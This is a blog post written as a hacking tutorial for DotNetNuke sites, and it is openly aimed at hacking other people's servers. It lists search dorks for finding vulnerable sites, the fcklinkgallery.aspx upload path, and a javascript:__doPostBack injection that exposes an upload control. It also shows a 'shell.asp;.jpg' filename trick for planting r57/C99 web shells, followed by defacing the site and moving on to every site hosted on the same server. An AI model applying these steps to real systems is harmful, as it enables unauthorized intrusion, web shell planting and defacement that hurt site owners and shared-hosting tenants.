Monday, 2 December 2013


Hello everyone!!
I am going to tell about Dot net nuke exploit.I know some of you know about it but it is very good exploit to hack dot net sites.it is fucking exploit.you can even hack all sites hosted on same server.You can upload any file using it.

Is it easy??? Yes. It is easy compared to other hacking attacks such as SQL-Injection and Cross Site Scripting.

What is DNN ?

DotNetNuke is an open source platform for building web sites based on Microsoft .NET technology. DotNetNuke is mainly provide Content Management System(CMS) for the personal websites.

Here is step by step tutorial:
Upload random file
Code:
*. swf, *.jpg, *.jpeg, *.jpe, *.gif, *.bmp, *.png,
*.doc, *.xls, *.ppt, *.pdf, *.txt, *.xml, *.xsl, *.css, *.zip, *.3gp,
*.asf, *.asx, *.avi, *.flv, *.m4v, *.mov, *.mp4, *.mpe, *.mpeg, *.mpg,
*.ram, *.rm, *.rmvb, *.wm, *.wmv, *.vob
by defualt but admin may change this and you will have a Shell directly
step 1:use this dork to find vulnerable site
Code:
inurl:home/tabid/36/language/en-US/Default.aspx
another dorks you can use
Code:
inurl:fcklinkgallery.aspx
inurl:/portals/0

step 2:now open any site like
Code:
http://www.vulsite.com/home/tabid/36/language/en-US/Default.aspx
replace "home/tabid/36/language/en-US/Default.aspx" with Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx 
so your url will become
Code:
http://www.vulsite.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
then hit enter

and if you are lucky you will get this

step 3:Select 3rd option[file] 

step 4: inject the following java code in browser address bar
Code:
javascript:__doPostBack('ctlURL$cmdUpload','')
you will get this upload option.

step 4:Now just upload your file for example mine is z.txt.when it is uploaded we can see it in root dir.

step 5:Navigate to 
Code:
http://www.vulsite.com/portals/0/z.txt

You can see our file successfully uploaded.

method to upload shell:

Things you need:
An ASP shell
r57 or C99 Shell or anyother shell

step 4:rename your asp shell to
Code:
yourshell.asp;.jpg
and upload it.

step 5:Navigate it through 
Code:
http://www.vulsite.com/portals/0/yourshell.asp;.jpg

step 6:Now upload your php shell using upload file option marked in above image.

step 7:Navigate it through 
Code:
http://www.vulsite.com/portals/0/yourphpshell.php
Voila you have your shell.Yeye

Deface
step 8:Now replace your index.html with original index.html.Thats it.

all sites in server 
Well you can hack all sites hosted on same server.
For that follow in image and click on that you will find all sites hosted on same server.Click on any one site and Now you know what to do..

0 comments:

Post a Comment